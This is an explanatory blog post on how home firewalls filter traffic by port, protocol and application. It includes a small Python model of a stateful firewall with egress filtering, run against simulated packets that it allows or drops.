Firewalls work on the concept of ports and protocols; the newer software ones work on applications.  A network connection is defined by two endpoints, each with an IP address and a port, plus the protocol of the connection itself.  That’s 5 pieces of information (the “5-tuple”) you can use to restrict access to your network.  Generally, home users don’t worry about IP addresses, but they do worry about ports and the protocol.  The protocol is usually TCP or UDP, although others exist (ICMP, which ping uses, has no ports at all), and a port is a number from 0 to 65535, although there are “well-known” ports that various services use (80 for HTTP, 443 for HTTPS, 53 for DNS).  Don’t bother remembering them unless you’re interested, you can always look them up 🙂  Most firewalls work with “rules” that specify at least one of the 5 pieces of information, with the assumption that anything left unspecified means “all”.
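The stateful inspection described earlier and the 5-tuple rules described here, as an added example that is not from the original post and is not any real firewall’s code: a small model of a home router that denies inbound traffic by default, records connections started from inside and lets their replies back in, honours explicit port forwards, and optionally applies an outbound allow-list.  The addresses, ports, the forwarded VoIP port and the egress list are constructed for the scenario; a real firewall also ages connections out and checks TCP flags, which this model skips.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    proto: str   # "tcp" or "udp"
    src: str
    sport: int
    dst: str
    dport: int


class StatefulFirewall:
    """Toy SPI firewall: default-deny inbound, track connections opened from inside,
    allow their replies, plus explicit port forwards and an optional egress allow-list."""

    def __init__(self, lan_prefix: str, port_forwards=(), egress_allow=None):
        self.lan_prefix = lan_prefix
        self.port_forwards = set(port_forwards)   # {(proto, dport)} reachable from the Internet
        self.egress_allow = egress_allow          # None = any outbound allowed; else {(proto, dport)}
        self.state = set()                        # 5-tuples of connections opened from inside
        self.log = []

    def _inside(self, ip: str) -> bool:
        return ip.startswith(self.lan_prefix)

    def _decide(self, p: Packet, verdict: str, why: str) -> str:
        self.log.append(f"{verdict:5} {p.proto} {p.src}:{p.sport} -> {p.dst}:{p.dport} ({why})")
        return verdict

    def handle(self, p: Packet) -> str:
        if self._inside(p.src) and not self._inside(p.dst):
            return self._outbound(p)
        if not self._inside(p.src) and self._inside(p.dst):
            return self._inbound(p)
        return self._decide(p, "ALLOW", "local traffic, never crosses the firewall")

    def _outbound(self, p: Packet) -> str:
        if self.egress_allow is not None and (p.proto, p.dport) not in self.egress_allow:
            return self._decide(p, "DROP", "egress filter: outbound port not on the allow-list")
        self.state.add((p.proto, p.src, p.sport, p.dst, p.dport))   # remember who we talked to
        return self._decide(p, "ALLOW", "outbound, connection recorded")

    def _inbound(self, p: Packet) -> str:
        # A reply is the mirror image of a connection we opened: swap the endpoints.
        if (p.proto, p.dst, p.dport, p.src, p.sport) in self.state:
            return self._decide(p, "ALLOW", "reply to a connection we started")
        if (p.proto, p.dport) in self.port_forwards:
            return self._decide(p, "ALLOW", "port forward")
        return self._decide(p, "DROP", "unsolicited inbound")


def run_scenario():
    """Constructed traffic against a home network 192.168.1.0/24 (documentation addresses outside)."""
    fw = StatefulFirewall("192.168.1.",
                          port_forwards={("udp", 5060)},                          # VoIP adapter
                          egress_allow={("tcp", 80), ("tcp", 443), ("udp", 53)})  # web and DNS only
    pc, web, voip, attacker = "192.168.1.10", "198.51.100.20", "203.0.113.40", "203.0.113.99"
    packets = [
        Packet("tcp", pc, 51000, web, 443),        # you browse to a web site
        Packet("tcp", web, 443, pc, 51000),        # the reply comes back in
        Packet("tcp", web, 443, pc, 51001),        # same server, but a port you never used
        Packet("tcp", attacker, 4444, pc, 445),    # Internet scan looking for open file sharing
        Packet("udp", voip, 5060, pc, 5060),       # incoming VoIP call on the forwarded port
        Packet("tcp", pc, 51002, attacker, 4444),  # malware "calling back" to the attacker
        Packet("tcp", pc, 51003, "198.51.100.25", 25),  # infected box trying to send spam directly
    ]
    return [fw.handle(p) for p in packets], fw.log


if __name__ == "__main__":
    for line in run_scenario()[1]:
        print(line)
```

Packets 2 and 3 are the whole point of “stateful”: both come from the same server and port, but only the one matching a connection the PC opened is let in.  Packets 6 and 7 are what the egress section above is about; without the allow-list the firewall would pass both, since they are outbound.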

Most (newer) software firewalls work on the concept of applications.  An application asks the firewall for permission to listen from the outside, and the user says “yes” this application can or “no” it can’t.  If the user says “yes”, the firewall allows any network connection to or from that application that the application requests – no matter what the port or protocol is.  This is more user-friendly, but can open a lot of holes that the user is unaware of – but you can bet attackers are.

Disclaimer: any links to products are affiliate links through Amazon.
